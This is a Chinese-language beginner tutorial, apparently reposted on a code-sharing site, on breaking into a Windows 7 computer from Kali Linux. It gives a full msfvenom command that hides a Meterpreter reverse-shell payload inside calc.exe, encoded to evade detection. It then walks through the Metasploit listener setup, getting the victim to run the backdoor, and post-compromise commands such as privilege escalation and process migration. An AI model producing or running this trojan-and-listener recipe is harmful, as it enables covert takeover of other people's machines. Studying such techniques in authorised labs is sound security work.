(初級)利用kaili linux入侵win7電腦


一、准備工作:

1、安裝kali linux

2、從win7上拷貝一個可執行的.exe文件至kali linux(文中使用的是windows自帶的calc.exe文件)

 

二、開始在kali linux上創建.exe文件

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -e x86/shikata_ga_nai -b 'x00' -x ./calc.exe -f exe -o /opt/z/backdoor.exe (沒有報錯就表示成功,可以切換到保存的路徑下查看)

ps:(LHOST=192.168.88.128    #本機ip地址

          LPORT=4444    #要監控的端口

          ./calc.exe      #從windows復制過來的.exe文件

          /opt/z/backdoor.exe    #生成的文件要存放的路徑和名稱)

ps:msfvenom的基本參數

Options:
    -p, --payload    <payload>       指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用&#039;-&#039;或者stdin指定
    -l, --list       [module_type]   列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all
    -n, --nopsled    <length>        為payload預先指定一個NOP滑動長度
    -f, --format     <format>        指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表)
    -e, --encoder    [encoder]       指定需要使用的encoder(編碼器)
    -a, --arch       <architecture>  指定payload的目標架構
        --platform   <platform>      指定payload的目標平台
    -s, --space      <length>        設定有效攻擊荷載的最大長度
    -b, --bad-chars  <list>          設定規避字符集,比如: &#039;\x00\xff&#039;
    -i, --iterations <count>         指定payload的編碼次數
    -c, --add-code   <path>          指定一個附加的win32 shellcode文件
    -x, --template   <path>          指定一個自定義的可執行文件作為模板
    -k, --keep                       保護模板程序的動作,注入的payload作為一個新的進程運行
        --payload-options            列舉payload的標准選項
    -o, --out   <path>               保存payload
    -v, --var-name <name>            指定一個自定義的變量,以確定輸出格式
        --shellest                   最小化生成payload
    -h, --help                       查看幫助選項
        --help-formats               查看msf支持的輸出格式列表

 

三、在kali linux上啟動監控

1、msfconsole    #進入msf命令

2、use exploit/multi/handler     #加載模塊

3、set lhost 192.168.88.1        #要監控的ip

4、set lport  4444                    #要監控的端口,與上文端口要一致

5、exploit -z -j                          #開始監聽,等待程序響應

 

四、在windows上運行backdoor.exe文件

 

五、查看並連接

1、sessions     #查看會話

有紅色框中的信息,表示存在會話

2、msf exploit(handler) > sessions -i 1    #連接會話

      出現"meterpreter >"表示連接成功,

3、連接成功以后可以進行操作,詳見下文:

ps:

getsystem #會自動利用各種各樣的系統漏洞來進行權限提升

migrate #進程id進程遷移

background #把當前的會話設置為背景,需要的時候在啟用

getuid #查看對方正在運行的用戶

ps #列出所有的進程

getpid #返回運行meterpreter的id號

sysinfo #產看系統信息和體系結構

shell #切換到cmd的系統權限方式

exit #退出shell會話返回meterpreter或終止meterpreter


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM